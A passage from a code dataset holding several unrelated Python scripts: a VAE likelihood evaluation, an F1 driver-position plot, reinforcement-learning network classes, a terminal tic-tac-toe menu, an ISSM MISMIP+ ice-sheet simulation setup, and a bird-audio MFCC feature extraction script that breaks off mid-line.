torch.load(\"src/experiment_checkpoints/21-01-12_19-26-27_Fashion_VAEWithVamp.pt\")\n state_dict = torch.load(\"src/experiment_checkpoints_without_time/MNIST_VAE.pt\")\n dataset_name = \"MNIST\"\n ds = dataset.load_test_dataset(dataset_name)\n dims = dataset.load_dims(dataset_name)\n # vae = models.VAEWithVampPrior(input_dims=dims, latent_dims=10, num_components=500)\n vae = models.VAE(input_dims=dims, latent_dims=40)\n vae.load_state_dict(state_dict)\n\n ll_per_point = vae.log_likelihood(ds, samples=100, batch_size=1000, use_cuda=True)\n average_ll = torch.logsumexp(ll_per_point, dim=0) - math.log(len(ds))\n print(average_ll)\n","sub_path":"src/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"542391339","text":"import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef get_average(numbers):\n step = 0\n race = 0\n while step != len(numbers) + 1:\n if step == 0:\n x = numbers[step]\n step += 2\n race += 1\n yield x\n if numbers[step-1] != 0:\n race += 1\n x = sum(numbers[:step]) / race\n step += 1\n yield x\n\nhome_name = [\n #2015\n 'AUS','MAL','CHN','BHR','ESP','MON','CAN','AUT','GBR',\n 'HUN','BEL','ITA','SIN','JPN','RUS','USA','MEX','BRA','ABU',\n #2016\n 'AUS','BHR','CHN','RUS','ESP','MON','CAN','EUR','AUT','GBR'\n]\n\nhome_ticks = [x for x in range(1, len(home_name) + 1)]\nplt.xticks(home_ticks, home_name)\n\nriccardo = [\n [6,4,7,7,10,4,9,18,10,4,5,19,2,7,10,3,5,19,5,8,5,2,5,3,1,4,2,5,4],\n [6,10,9,6,7,5,13,10,0,3,0,8,2,15,0,10,5,11,6,4,4,4,11,4,2,7,7,5,4]\n]\n\nverstappen = [\n [12,6,13,15,11,9,19,7,13,9,18,20,8,15,9,8,8,9,11,4,10,9,9,4,21,5,9,8,3],\n # DNF - AUS 2015\n [7,0,18,11,0,15,8,0,4,8,12,8,9,10,4,9,9,16,10,6,8,0,1,0,4,8,2,3]\n]\n\nsainz = [\n [8,15,14,9,9,20,11,12,8,12,19,17,14,12,20,20,11,19,10,7,11,8,11,8,6,15,18,15,7],\n [9,8,14,19,9,10,12,0,14,0,0,11,9,10,0,7,13,0,11,9,0,9,12,6,8,9,0,8,8]\n]\n\nkvyat = [\n [13,5,12,17,19,5,8,15,7,7,12,18,4,10,11,4,4,7,9,18,15,6,8,13,8,16,6,22,14],\n # DNF - AUS 2015\n [9,0,9,10,4,9,12,6,2,4,10,6,13,5,0,4,7,10,0,7,3,15,10,0,12,0,0,10]\n]\n\n#race\nplt.plot(home_ticks, np.array([x for x in get_average(riccardo[1])]), color='red')\nplt.plot(home_ticks[1:], np.array([x for x in get_average(verstappen[1])]), color='orange')\nplt.plot(home_ticks, np.array([x for x in get_average(sainz[1])]), color='green')\nplt.plot(home_ticks[1:], np.array([x for x in get_average(kvyat[1])]), color='purple')\n\n#quali\nplt.plot(home_ticks, np.array([x for x in get_average(riccardo[0])]), color='red', linestyle='dashed')\nplt.plot(home_ticks, np.array([x for x in get_average(verstappen[0])]), color='orange', linestyle='dashed')\nplt.plot(home_ticks, np.array([x for x in get_average(sainz[0])]), color='green', linestyle='dashed')\nplt.plot(home_ticks, np.array([x for x in get_average(kvyat[0])]), color='purple', linestyle='dashed')\n\n\nplt.axvline(x=1, color='gray', linestyle='dashed',\n label='pre-industrial', lw=1.5)\nplt.text(1.1,0.5,'2015')\nplt.axvline(x=20, color='gray', linestyle='dashed',\n label='pre-industrial', lw=1.5)\nplt.text(20.1,0.5,'2016')\n\nplt.axvline(x=24, color='gray', linestyle='dotted',\n label='pre-industrial', lw=1.5)\nplt.text(24.1,0.5,'KVY<->VES')\n\nplt.title('RedBull Racing drivers average position per clean race/qualification', fontsize=18)\nplt.legend(['Daniel Ricciardo', 'Max Verstappen', 'Carlos Sainz', 'Daniil Kvyat', 'Qualification'], loc='upper left')\nplt.xlabel('GP HOME')\nplt.ylabel('Average Position')\nplt.gca().invert_yaxis()\n\nplt.show()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"644380423","text":"#######################################################################\n# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #\n# Permission given to modify the code as long as you keep this #\n# declaration at the top #\n#######################################################################\n\nfrom .base_network import *\n\n# Network for CartPole with value based methods\nclass FCNet(nn.Module, VanillaNet):\n def __init__(self, dims, optimizer_fn=None, gpu=True):\n super(FCNet, self).__init__()\n self.fc1 = nn.Linear(dims[0], dims[1])\n self.fc2 = nn.Linear(dims[1], dims[2])\n self.fc3 = nn.Linear(dims[2], dims[3])\n BasicNet.__init__(self, optimizer_fn, gpu)\n\n def forward(self, x):\n x = self.to_torch_variable(x)\n x = x.view(x.size(0), -1)\n y = F.relu(self.fc1(x))\n y = F.relu(self.fc2(y))\n y = self.fc3(y)\n return y\n\n# Network for CartPole with dueling architecture\nclass DuelingFCNet(nn.Module, DuelingNet):\n def __init__(self, dims, optimizer_fn=None, gpu=True):\n super(DuelingFCNet, self).__init__()\n self.fc1 = nn.Linear(dims[0], dims[1])\n self.fc2 = nn.Linear(dims[1], dims[2])\n self.fc_value = nn.Linear(dims[2], 1)\n self.fc_advantage = nn.Linear(dims[2], dims[3])\n BasicNet.__init__(self, optimizer_fn, gpu)\n\n def forward(self, x):\n x = self.to_torch_variable(x)\n x = x.view(x.size(0), -1)\n y = F.relu(self.fc1(x))\n phi = F.relu(self.fc2(y))\n return phi\n\n# Network for CartPole with actor critic\nclass ActorCriticFCNet(nn.Module, ActorCriticNet):\n def __init__(self, state_dim, action_dim):\n super(ActorCriticFCNet, self).__init__()\n hidden_size1 = 50\n hidden_size2 = 200\n self.fc1 = nn.Linear(state_dim, hidden_size1)\n self.fc2 = nn.Linear(hidden_size1, hidden_size2)\n self.fc_actor = nn.Linear(hidden_size2, action_dim)\n self.fc_critic = nn.Linear(hidden_size2, 1)\n BasicNet.__init__(self, None, False)\n\n def forward(self, x, update_LSTM=True):\n x = self.to_torch_variable(x)\n x = x.view(x.size(0), -1)\n x = F.relu(self.fc1(x))\n phi = self.fc2(x)\n return phi\n\nclass FruitHRFCNet(nn.Module, VanillaNet):\n def __init__(self, state_dim, action_dim, head_weights, optimizer_fn=None, gpu=True):\n super(FruitHRFCNet, self).__init__()\n hidden_size = 250\n self.fc1 = nn.Linear(state_dim, hidden_size)\n self.fc2 = nn.ModuleList([nn.Linear(hidden_size, action_dim) for _ in head_weights])\n self.head_weights = head_weights\n BasicNet.__init__(self, optimizer_fn, gpu)\n\n def forward(self, x, heads_only):\n x = self.to_torch_variable(x)\n x = x.view(x.size(0), -1)\n x = F.relu(self.fc1(x))\n head_q = [fc(x) for fc in self.fc2]\n if not heads_only:\n q = [h * w for h, w in zip(head_q, self.head_weights)]\n q = torch.stack(q, dim=0)\n q = q.sum(0).squeeze(0)\n return q\n else:\n return head_q\n\n def predict(self, x, heads_only):\n return self.forward(x, heads_only)\n\nclass FruitMultiStatesFCNet(nn.Module, BasicNet):\n def __init__(self, state_dim, action_dim, head_weights, optimizer_fn=None, gpu=True):\n super(FruitMultiStatesFCNet, self).__init__()\n hidden_size = 250\n self.fc1 = nn.ModuleList([nn.Linear(state_dim, hidden_size) for _ in head_weights])\n self.fc2 = nn.ModuleList([nn.Linear(hidden_size, action_dim) for _ in head_weights])\n self.head_weights = head_weights\n self.state_dim = state_dim\n self.n_heads = head_weights.shape[0]\n BasicNet.__init__(self, optimizer_fn, gpu)\n\n def predict(self, x, merge):\n head_q = []\n for i in range(self.n_heads):\n q = self.to_torch_variable(x[:, i, :])\n q = self.fc1[i](q)\n q = F.relu(q)\n q = self.fc2[i](q)\n head_q.append(q)\n if merge:\n q = [q * w for q, w in zip(head_q, self.head_weights)]\n q = torch.stack(q, dim=0)\n q = q.sum(0).squeeze(0)\n return q\n return head_q\n","sub_path":"DeepRL/network/shallow_network.py","file_name":"shallow_network.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326218498","text":"#! python\n\n\"\"\"\nGame: Tic-tac-toe.\n\"\"\"\n\nfrom txt_game.tic_tac_toe.settings import read_setting, save_settings, sm, input_set\nfrom txt_game.rendering import rend_menu, clr\nfrom txt_game.tic_tac_toe.game import run_game\nfrom txt_game.tic_tac_toe.statistics import show_stat\nimport keyboard\nimport threading\nimport time\n\n\nFPS = 5\n\nsettings = read_setting()\nmode = '1'\n# '1' - Comp VS Player;\n# '2' - Player 1 VS Player 2;\n\n\nmenu = [sm['main']]\nselected_point = 0\n\nlast_key = None\nexit_key = False\npause_key = False\nplay_key = False\n\n\ndef main():\n global play_key, exit_key, settings\n while True:\n if not pause_key:\n clr(rend_menu(menu[-1], settings, selected_point))\n time.sleep(1/FPS)\n keyboard.hook(check_pressed_keys)\n if exit_key:\n clr('Setting saved.\\nPowered by Efi-fi.')\n save_settings(settings)\n exit()\n if play_key:\n run_game(settings, mode)\n play_key = False\n\n\ndef key_down():\n global selected_point, menu\n if selected_point < len(menu[-1]) - 1:\n selected_point += 1\n else:\n selected_point = 0\n\n\ndef key_up():\n global selected_point, menu\n if selected_point > 0:\n selected_point -= 1\n else:\n selected_point = len(menu[-1]) - 1\n\n\ndef key_esc():\n global selected_point, menu, exit_key\n if len(menu) < 2:\n exit_key = True\n else:\n selected_point = 0\n menu.pop()\n\n\ndef check_pressed_keys(event):\n \"\"\"\n Check keys and performing actions according event.\n \"\"\"\n global selected_point, last_key, play_key, mode, settings, pause_key, fig\n if not last_key or (event.name != last_key.name) or (event.event_type == 'down' and last_key.event_type == 'up'):\n # processing events\n if event.name == 'down':\n key_down()\n elif event.name == 'up':\n key_up()\n elif event.name == 'esc':\n key_esc()\n elif event.name == 'space':\n # processing selected item\n if menu[-1][selected_point] == 'Exit':\n key_esc()\n elif menu[-1][selected_point] == 'Back':\n menu.pop()\n selected_point = 0\n elif menu[-1][selected_point].lower() in sm:\n menu.append(sm[menu[-1][selected_point].lower()])\n selected_point = 0\n elif menu[-1][selected_point] == 'One player':\n mode = '1'\n play_key = True\n elif menu[-1][selected_point] == 'Two players':\n mode = '2'\n play_key = True\n elif menu[-1][selected_point] == 'Statistics':\n pause_key = True\n clr()\n show_stat()\n input('Press Enter to continue ')\n pause_key = False\n else:\n pause_key = True\n input_set(settings, menu, selected_point)\n pause_key = False\n last_key = event\n keyboard.unhook_all()\n\n\nif __name__ == '__main__':\n main()\nelse:\n print('This module is not for import!')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510976007","text":"\"\"\"\nTime to compute using 5 processes on a Intel(R) Xeon(R) CPU E5-1620 v4 @ 3.50GHz\nis:\n\n FemModel initialization elapsed time: 0.636059\n Core solution elapsed time: 37978\n\n Total elapsed time: 10 hrs 32 min 58 sec\n\nwrite lock file:\n\n FemModel initialization elapsed time: 0.135978\n Core solution elapsed time: 134032\n\n Total elapsed time: 37 hrs 13 min 51 sec\nclosing PETSc\nclosing MPI\nloading results from cluster\nShelving variables to existing file './results/BP/shelf_bc_subelement_slip_fric_1e4_iceFront_dx_10000_wall_slip_dt_0.1.md'.\nVariable 'md' shelved.\n\n\"\"\"\n\n\n#from netCDF4 import Dataset\n#from fenics_viz import print_text, plot_variable\nimport issm as im\nimport numpy as np\nimport os\n\n# directories for saving data :\nmdl_odr = 'HO'\nlat_slip = True\nname = 'lateral_slip'\n\nif mdl_odr == 'HO': mdl_pfx = 'BP'\nelse: mdl_pfx = mdl_odr\nplt_dir = './images/' + mdl_pfx + '/' + name + '/'\nout_dir = './results/' + mdl_pfx + '/'\n\n# create the output directory if it does not exist :\nd = os.path.dirname(out_dir)\nif not os.path.exists(d):\n os.makedirs(d)\n\n# MISMIP+ experiment :\nmd = im.model()\nmd.miscellaneous.name = name\n\n#===============================================================================\n\n# define the geometry of the simulation :\nLx = 640000.0 # [m] domain length (along ice flow)\nLy = 80000.0 # [m] domain width (across ice flow)\ndx = 10000.0 # [m] element diameter \nnx = int(Lx/dx) # [--] number of x-coordinate divisions\nny = int(Ly/dx) # [--] number of y-coordinate divisions\nB0 = -150.0 # [m] bedrock topography at x = 0\nB2 = -728.8 # [m] second bedrock topography coefficient\nB4 = 343.91 # [m] third bedrock topography coefficient\nB6 = -50.57 # [m] second bedrock topography coefficient\nxbar = 300000.0 # [m] characteristic along-flow length scale of bedrock\nfc = 4000.0 # [m] characteristic width of channel walls\ndc = 500.0 # [m] depth of the trough compared to its walls\nwc = 24000.0 # [m] half width of the trough\nzd = -720.0 # [m] maximum depth of the bedrock topography\nthklim = 10.0 # [m] thickness limit\nrhow = 1028.0 # [kg m^-3] density of seawater\nrhoi = 918.0 # [kg m^-3] density of glacier ice\ng = 9.81 # [m s^2] gravitational acceleration\nspy = 31556926.0 # [s a^-1] seconds per year\nHini = 100.0 # [m] initial ice thickness\nTm = 273.15 # [K] melting temperature of ice\nn = 3.0 # [--] Glen's exponent\nA = 2e-17 # [Pa^{-n} s^{-1}] flow \nbeta = 1e4 # [Pa m^{-1/n} a^{-1/n}] friction coefficient\np = 3.0 # [--] Paterson friction exponent one\nq = 0.0 # [--] Paterson friction exponent two\nadot = 0.3 # [m a^{-a}] surface-mass balance\ntf = 1 # [a] final time\ndt = 1 # [a] time step\ndt_sav = 1 # [a] time interval to save data\ncfl = 0.5 # [--] CFL coefficient\nnum_p = 4 # [--] number of processor cores to use\n\n# create an empty rectangular mesh :\n#md = triangle(md, './exp/MismipDomain.exp', 10000)\nmd = im.squaremesh(md, Lx, Ly, nx=nx, ny=ny)\nmd = im.setmask(md, 'all', '')\n\n# set up element-wise multiplicative identities :\n\n# rank-zero tensor vertex ones vector :\nv_ones = np.ones(md.mesh.numberofvertices)\n\n# rank-zero tensor element ones vector :\ne_ones = np.ones(md.mesh.numberofelements)\n\n# rank-two tensor ones vector :\nA_ones = np.ones((md.mesh.numberofvertices, 6))\n\n# rank-one tensor ones vector :\nb_ones = np.ones((md.mesh.numberofvertices, 3))\n\n# interpolate the thickness data onto the mesh :\n#data = Dataset('data/weertman-A2.2e-17-ssa.nc', mode = 'r')\n#xd = np.array(data.variables['x'][:])\n#yd = np.array(data.variables['y'][:])\n#Hd = np.array(data.variables['thickness'][:])\n#H = im.InterpFromGridToMesh(xd, yd, Hd, md.mesh.x, md.mesh.y, thklim)[0]\nH = Hini * v_ones\n\n# eq'n (3)\nxt = md.mesh.x / xbar\n\n# eq'n (2) :\nBx = B0 + B2*xt**2 + B4*xt**4 + B6*xt**6\n\n# eq'n (4) :\nBy = + dc / (1 + np.exp(-2*(md.mesh.y - Ly/2 - wc) / fc)) \\\n + dc / (1 + np.exp( 2*(md.mesh.y - Ly/2 + wc) / fc))\n\n# lower topography (eq'n 1) :\nzb = np.maximum(Bx + By, zd*v_ones)\n\n# upper surface which does not take into account flotation :\nS = zb + H\n\n# grounded ice level-set flotation :\nls = H + rhow / rhoi * zb\n\n# get indicies of grounded (gnd) and floating (flt) ice :\ngnd = ls > 0\nflt = ls <= 0\n\n# ice is grounded where == 1 :\nmask = gnd.astype('int')\n\n# correct upper surface to be in equilibrium with the flotation height :\nS[flt] = H[flt] * (1 - rhoi / rhow)\n\n# lower surface :\nB = S - H;\n\n# specify rheology parameters :\nBf = (A / spy)**(-1/n)\n\n#===============================================================================\n# specify constants and varaibles used by MISMIP experiment :\n\nmd.materials.rho_ice = rhoi\nmd.materials.rho_water = rhow\nmd.constants.g = g\nmd.constants.yts = spy\nmd.geometry.surface = S\nmd.geometry.base = B\nmd.geometry.thickness = H\nmd.geometry.bed = zb\nmd.mask.groundedice_levelset = mask # ice is grounded where == 1\nmd.mask.ice_levelset = -1 * v_ones # ice is present when negative\n\n\nmd.friction.p = p * e_ones\nmd.friction.q = q * e_ones\nmd.friction.coefficient = beta * v_ones\nfloating_v = np.where(md.mask.groundedice_levelset < 0)[0]\n#md.friction.coefficient[floating_v] = 0\n\nmd.materials.rheology_B = Bf * v_ones\nmd.materials.rheology_n = n * e_ones\n#md.materials.rheology_B = im.paterson((Tm - 20.0) * v_ones)\nmd.materials.rheology_law = \"None\"\n\nmd.basalforcings.geothermalflux = 0.0 * v_ones\nmd.basalforcings.groundedice_melting_rate = 0.0 * v_ones\nmd.basalforcings.floatingice_melting_rate = 0.0 * v_ones\n\n# Set the default boundary conditions for an ice-sheet :\nmd = im.SetMarineIceSheetBC(md, './exp/mismip_front.exp')\n#md = im.SetIceShelfBC(md, './exp/mismip_front.exp')\n\n#md.stressbalance.referential = np.nan * A_ones\n#md.stressbalance.loadingforce = np.nan * b_ones\n\n# apply lateral slip on north, south, and west boundaries :\nif lat_slip: slip = np.nan\nelse: slip = 0.0\n\n# inflow boundary condition :\npos_w = np.where(md.mesh.x < 0.1)[0]\nmd.stressbalance.spcvx[pos_w] = 0.0\nmd.stressbalance.spcvy[pos_w] = slip\nmd.stressbalance.spcvz[pos_w] = slip\n\n# north wall :\npos_n = np.where(md.mesh.y > np.max(md.mesh.y) - 0.1)[0]\nmd.stressbalance.spcvx[pos_n] = slip \nmd.stressbalance.spcvy[pos_n] = 0.0\nmd.stressbalance.spcvz[pos_n] = slip\n\n# south wall :\npos_s = np.where(md.mesh.y < 0.1)[0]\nmd.stressbalance.spcvx[pos_s] = slip\nmd.stressbalance.spcvy[pos_s] = 0.0\nmd.stressbalance.spcvz[pos_s] = slip\n\n# go back and ensure that the west corners have zero x-component velocity :\nmd.stressbalance.spcvx[pos_w] = 0.0\n\nmd.smb.mass_balance = adot * v_ones\n#md.thermal.spctemperature = np.nan * v_ones\n\n#md.groundingline.migration = 'SoftMigration'\nmd.groundingline.migration = 'SubelementMigration'\n#md.groundingline.migration = 'SubelementMigration2'\n#md.groundingline.migration = 'AggressiveMigration'\n#md.groundingline.migration = 'None'\nmd.masstransport.hydrostatic_adjustment = 'Incremental'\nmd.masstransport.spcthickness = np.nan * v_ones\nmd.masstransport.stabilization = 1\n\n# initialization :\nmd.initialization.vx = 0.0 * v_ones\nmd.initialization.vy = 0.0 * v_ones\nmd.initialization.vz = 0.0 * v_ones\nmd.initialization.vel = 0.0 * v_ones\nmd.initialization.pressure = rhoi * g * H\nmd.initialization.temperature = Tm * v_ones\n\n# tansient settings :\nmd.transient.isstressbalance = 1\nmd.transient.isgroundingline = 1\nmd.transient.ismasstransport = 1\nmd.transient.issmb = 1\nmd.transient.isthermal = 0\nmd.timestepping.time_adapt = 0\nmd.timestepping.cfl_coefficient = cfl\nmd.timestepping.time_step = dt\nmd.timestepping.final_time = tf\nmd.settings.output_frequency = int(dt_sav/dt)\n\nmd.transient.requested_outputs = ['default',\n 'GroundedArea',\n 'FloatingArea',\n 'IceVolume',\n 'IceVolumeAboveFloatation']\n\n# now, extrude and set the basal boundary conditions :\nmd.extrude(6, 1.0)\n\n# specifiy the flow equation and FE basis :\nmd = im.setflowequation(md, mdl_odr, 'all')\nmd.flowequation.fe_HO = 'P1'\n\n## set no-slip basal velocity BC :\n## FIXME: if you do not call ``md.extrude()`` before, ``md.mesh.vertexonbase``\n## does not exist.\n#basal_v = md.mesh.vertexonbase\n#md.stressbalance.spcvx[basal_v] = 0.0\n#md.stressbalance.spcvy[basal_v] = 0.0\n#md.stressbalance.spcvz[basal_v] = 0.0\n\n\n#===============================================================================\n# save the state of the model :\nim.savevars(out_dir + 'mismip_init.md', 'md', md)\n\n#===============================================================================\n# solve :\n\n## initialize the velocity for the CFL condition:\n#md.cluster = im.generic('name', im.gethostname(), 'np', 2)\n#md.verbose = im.verbose('solution', True, 'convergence', True)\n#md = im.solve(md, 'Stressbalance')\n#\n#md.initialization.vx = md.results.StressbalanceSolution.Vx\n#md.initialization.vy = md.results.StressbalanceSolution.Vy\n#md.initialization.vz = md.results.StressbalanceSolution.Vz\n#md.initialization.vel = md.results.StressbalanceSolution.Vel\n\n# solve the transient :\n#md.cluster = im.ollie('name', im.gethostname(), 'np', num_p)\nmd.cluster = im.ollie('name', name, 'np', num_p, 'login', 'ecumming')\nmd.verbose = im.verbose('solution', True, 'control', True, 'convergence', True)\nmd = im.solve(md, 'Transient')\n\n#===============================================================================\n# save the state of the model :\n# FIXME: the savevars method will work for small problems, but fails without \n# error for large ones.\nim.savevars(out_dir + name + '.md', 'md', md)\n\nvar_dict = {'md.results.TransientSolution' : md.results.TransientSolution}\nim.savevars(out_dir + name + '.shelve', var_dict)\n\n\n\n","sub_path":"simulations/mismip/issm/mismip.py","file_name":"mismip.py","file_ext":"py","file_size_in_byte":10503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"488136260","text":"import pandas as pd\r\nimport numpy as np\r\nimport soundfile as sf\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom scipy import fft\r\nfrom scipy.fftpack import dct\r\nimport math\r\nimport librosa, librosa.display\r\nimport scipy.io.wavfile\r\n\r\n\r\n\r\nfrom sklearn.neighbors import NearestNeighbors\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.cluster import DBSCAN\r\nfrom collections import Counter\r\nfrom sklearn.manifold import TSNE\r\n\r\n\r\n\r\ndef frequency_sepectrum(x, sf):\r\n \"\"\"\r\n Derive frequency spectrum of a signal from time domain\r\n :param x: signal in the time domain\r\n :param sf: sampling frequency\r\n :returns frequencies and their content distribution\r\n \"\"\"\r\n x = x - np.average(x) # zero-centering\r\n\r\n n = len(x)\r\n k = np.arange(n)\r\n tarr = n / float(sf)\r\n frqarr = k / float(tarr) # two sides frequency range\r\n\r\n frqarr = frqarr[range(n // 2)] # one side frequency range\r\n\r\n x = np.fft.fft(x) / n # fft computing and normalization\r\n x = x[range(n // 2)]\r\n\r\n return frqarr, abs(x)\r\n\r\n\r\n\"\"\"\r\n#matplotlib inline\r\nrcParams('figure.figsize') = 5, 4\r\nsb.set_style 'whitegrid'\r\n\"\"\"\r\n\r\n\"\"\"\r\nObtaining Paths\r\n\"\"\"\r\npath_to_data = 'F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned'\r\ndays = [14, 15, 16, 18, 19]\r\n\r\n#Choose which file type you want to extract\r\nwanted_file = 'DAQmxChannels'\r\n\r\n#Make list of all the file paths for later use\r\nfile_paths = []\r\nfor d in days:\r\n path_to_data = 'F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned'\r\n path_to_data = path_to_data + '/2018-08-{}'.format(d)\r\n for f in os.listdir(path_to_data):\r\n if f.rfind(wanted_file) != -1:\r\n file_paths.append(path_to_data + '/' + f)\r\n\r\n#print(np.asarray(file_paths))\r\n\r\n\"\"\"\r\nExtract Audio and Sampling Rate\r\n\"\"\"\r\n#start_point = 16\r\n#end_point = 19\r\nstart_point = 980\r\nend_point = 1010\r\naudio, sr = sf.read('F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned/2018-08-14/b8p2male-b10o15female_9_DAQmxChannels.w64')\r\n#audio, sr = sf.read('F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned/2018-08-14/b8p2male-b10o15female_9_SdrChannels.w64')\r\naudio = audio[int(start_point*sr):int(end_point * sr)]\r\n\r\nprint('Sampling Rate: ', sr)\r\nprint('Audio shape: ', audio.shape)\r\n\r\n\"\"\"\r\nSimple Audio and Frequency Plot\r\n\"\"\"\r\nt = np.arange(len(audio)) / float(sr)\r\nplt.subplot(2, 1, 1)\r\nplt.plot(t, audio)\r\nplt.xlabel('t')\r\nplt.ylabel('y')\r\n\"\"\"\r\nfrq, X = frequency_sepectrum(audio, sr)\r\n\r\nplt.subplot(2, 1, 2)\r\nplt.plot(frq, X, 'b')\r\nplt.xlabel('Freq (Hz)')\r\nplt.ylabel('|X(freq)|')\r\nplt.tight_layout()\r\n\"\"\"\r\nplt.show()\r\n\r\n\r\n\"\"\"\r\nMFCC and Filter Bank Features\r\n\"\"\"\r\n\"\"\"\r\n#pre emphasis audio signal\r\npre_emphasis = 0.97\r\nemphasized_audio = np.append(audio[0], audio[1:] - pre_emphasis * audio[:-1])\r\nprint(emphasized_audio.shape)\r\n#produce frames\r\nframe_size = 0.025\r\nframe_stride = 0.01\r\nframe_length, frame_step = frame_size * sr, frame_stride * sr # Convert from seconds to samples\r\nsignal_length = len(emphasized_audio)\r\nframe_length = int(round(frame_length))\r\nframe_step = int(round(frame_step))\r\nnum_frames = int(np.ceil(float(np.abs(signal_length - frame_length)) / frame_step)) # Make sure that we have at least 1 frame\r\nnum_frames=num_frames+3\r\nprint(num_frames)\r\npad_signal_length = num_frames * frame_step + frame_length\r\nprint(pad_signal_length)\r\nz = np.zeros((pad_signal_length - signal_length))\r\npad_signal = np.append(emphasized_audio, z) # Pad Signal to make sure that all frames have equal number of samples without truncating any samples from the original signal\r\n\r\nindices = np.tile(np.arange(0, frame_length), (num_frames, 1)) + np.tile(np.arange(0, num_frames * frame_step, frame_step), (frame_length, 1)).T\r\nframes = pad_signal[indices.astype(np.int32, copy=False)]\r\n#Apply window\r\nframes *= np.hamming(frame_length)\r\n#Fourier Transform\r\nNFFT = 512\r\nmag_frames = np.absolute(np.fft.rfft(frames, NFFT)) # Magnitude of the FFT\r\npow_frames = ((1.0 / NFFT) * ((mag_frames) ** 2)) # Power Spectrum\r\n#Filter Bank\r\nnfilt = 40\r\nlow_freq_mel = 0\r\nhigh_freq_mel = (2595 * np.log10(1 + (sr / 2) / 700)) # Convert Hz to Mel\r\nmel_points = np.linspace(low_freq_mel, high_freq_mel, nfilt + 2) # Equally spaced in Mel scale\r\nhz_points = (700 * (10**(mel_points / 2595) - 1)) # Convert Mel to Hz\r\nbin = np.floor((NFFT + 1) * hz_points / sr)\r\n\r\nfbank = np.zeros((nfilt, int(np.floor(NFFT / 2 + 1))))\r\nfor m in range(1, nfilt + 1):\r\n f_m_minus = int(bin[m - 1]) # left\r\n f_m = int(bin[m]) # center\r\n f_m_plus = int(bin[m + 1]) # right\r\n\r\n for k in range(f_m_minus, f_m):\r\n fbank[m - 1, k] = (k - bin[m - 1]) / (bin[m] - bin[m - 1])\r\n for k in range(f_m, f_m_plus):\r\n fbank[m - 1, k] = (bin[m + 1] - k) / (bin[m + 1] - bin[m])\r\nfilter_banks = np.dot(pow_frames, fbank.T)\r\nfilter_banks = np.where(filter_banks == 0, np.finfo(float).eps, filter_banks) # Numerical Stability\r\nfilter_banks = 20 * np.log10(filter_banks) # dB\r\n#MFCC\r\nnum_ceps = 20\r\nmfcc = dct(filter_banks, type=2, axis=1, norm='ortho')[:, 1 : (num_ceps + 1)] # Keep 2-13\r\n\r\n#sinusoidal filtering\r\n\r\n#(nframes, ncoeff) = mfcc.shape\r\n#n = np.arange(ncoeff)\r\n#lift = 1 + (cep_lifter / 2) * np.sin(np.pi * n / cep_lifter)\r\n#mfcc *= lift #*\r\n\r\n#Mean normalisation\r\nfilter_banks -= (np.mean(filter_banks, axis=0) + 1e-8)\r\nmfcc -= (np.mean(mfcc, axis=0) + 1e-8)\r\n\r\nprint(\"MFCC shape = \",mfcc.shape)\r\nprint(\"Filter_banks = \",filter_banks.shape)\r\n\r\nplt.imshow(mfcc.T, aspect='auto', origin='lower', interpolation='none', cmap=plt.cm.jet)\r\nplt.title(\"MFCCs in frames\")\r\nplt.show()\r\nplt.imshow(filter_banks.T, aspect='auto', origin='lower', interpolation='none', cmap=plt.cm.jet)\r\nplt.title(\"Filter_banks in frames\")\r\nplt.show()\r\n\"\"\"\r\n\"\"\"\r\nLibrosa\r\n\"\"\"\r\n\r\n\"\"\"\r\nLoad Audio\r\n\"\"\"\r\naudio_librosa, sr_librosa = librosa.load('F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned/2018-08-14/b8p2male-b10o15female_9_DAQmxChannels.w64', sr = None)\r\n#audio_librosa, sr_librosa = librosa.load('F:/Neural Systems Project/Birdstuff/b8p2male-b10o15female_aligned/2018-08-14/b8p2male-b10o15female_9_SdrChannels.w64', sr = None)\r\naudio_librosa = audio_librosa[int(start_point*sr_librosa):int(end_point*sr_librosa)]\r\nprint(sr_librosa)\r\nprint(audio_librosa.shape)\r\n\r\n\"\"\"\r\nSopectrum\r\n\"\"\"\r\nspectrum = librosa.core.stft(audio_librosa, n_fft=int(0.025*sr_librosa), hop_length=int(0.010*sr_librosa))\r\nabsolute_value = np.abs(spectrum)\r\nprint(absolute_value.shape)\r\n\"\"\"\r\nMFCC\r\n\"\"\"\r\n#\"\"\"\r\nmfcc_librosa = librosa.feature.mfcc(S=absolute_value, sr=sr_librosa)\r\nprint(\"Librosa_mfcc = \",mfcc_librosa.shape)\r\nplt.figure(figsize=(10, 4))\r\nlibrosa.display.specshow(mfcc_librosa, x_axis='time', cmap=plt.cm.jet)\r\nplt.colorbar()\r\nplt.title('MFCC')\r\nplt.tight_layout()\r\nplt.show()\r\n#\"\"\"\r\n\"\"\"\r\nChroma Feature\r\n\"\"\"\r\nchromagram = librosa.feature.chroma_stft(S=absolute_value, sr=sr_librosa)\r\nplt.figure(figsize=(15, 5))\r\nlibrosa.display.specshow(chromagram, x_axis='time', y_axis='chroma', hop_length=512, cmap='coolwarm')\r\nplt.show()\r\nprint(\"Chromogram = \",chromagram.shape)\r\n\"\"\"\r\nRoll-off\r\n\"\"\"\r\nroll_off=librosa.feature.spectral_rolloff(S=absolute_value, sr=sr_librosa)\r\nprint(\"Roll_off = \", 